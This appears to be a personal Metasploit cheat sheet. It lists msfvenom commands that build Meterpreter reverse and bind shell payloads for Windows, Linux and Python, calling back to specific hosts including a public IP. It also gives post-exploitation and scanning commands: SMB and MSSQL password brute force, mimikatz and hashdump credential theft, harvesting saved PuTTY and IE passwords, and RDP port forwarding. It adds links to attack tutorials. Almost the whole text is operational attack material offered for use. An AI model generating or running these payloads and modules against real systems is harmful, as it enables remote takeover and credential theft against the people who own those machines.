Reverse-connection (reverse_tcp) payloads that generated successfully:
(1) msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe > /home/niexinming/back.exe
(2) msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=120.131.70.121 LPORT=7788 -f aspx > /home/niexinming/back.aspx
(3) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=120.131.70.121 LPORT=7788 -f elf > /home/niexinming/shell.elf
(4) msfvenom -p python/meterpreter/reverse_tcp LHOST=120.131.70.121 LPORT=7788 > /home/niexinming/shell1.py
Listening (bind_tcp) payload that generated successfully:
msfvenom -a x86 --platform win -p windows/meterpreter/bind_tcp LPORT=5566 -f exe > /home/niexinming/bind.exe
http://wooyun.org/bugs/wooyun-2010-0135828
http://www.2cto.com/Article/201211/165910.html
https://www.91ri.org/8476.html
https://www.91ri.org/5462.html
Generating payloads: http://netsec.ws/?p=331
PowerShell sessions: https://www.trustedsec.com/june-2015/interactive-powershell-sessions-within-meterpreter/
Loading mimikatz in meterpreter to dump hashes and plaintext passwords: http://qqhack8.blog.163.com/blog/static/114147985201473111222189/
Connecting to databases: http://blog.csdn.net/hope_smile/article/details/43932975
Local listener (handler for the reverse connection): use exploit/multi/handler
Port scan: use auxiliary/scanner/portscan/tcp
SMB scan to identify hosts: use auxiliary/scanner/smb/smb_version
(Important) SMB password brute force: use auxiliary/scanner/smb/smb_login
Find live hosts: meterpreter > run arp_scanner -r
meterpreter > load mimikatz // load mimikatz
meterpreter > run getgui -f 12345 -e // forward Remote Desktop (forwards the remote port 3389 to local port 12345; then run rdesktop 127.0.0.1:12345 locally)
Find anonymous FTP servers on the LAN: auxiliary/scanner/ftp/anonymous
Find passwords saved by PuTTY: meterpreter > run enum_putty
Find passwords saved by IE: meterpreter > run post/windows/gather/enum_ie
Windows password hashes: meterpreter > run windows/gather/smart_hashdump
Get local subnets: meterpreter > run get_local_subnets
MSSQL login brute force: use auxiliary/scanner/mssql/mssql_login
Execute cmd via MSSQL: use auxiliary/admin/mssql/mssql_exec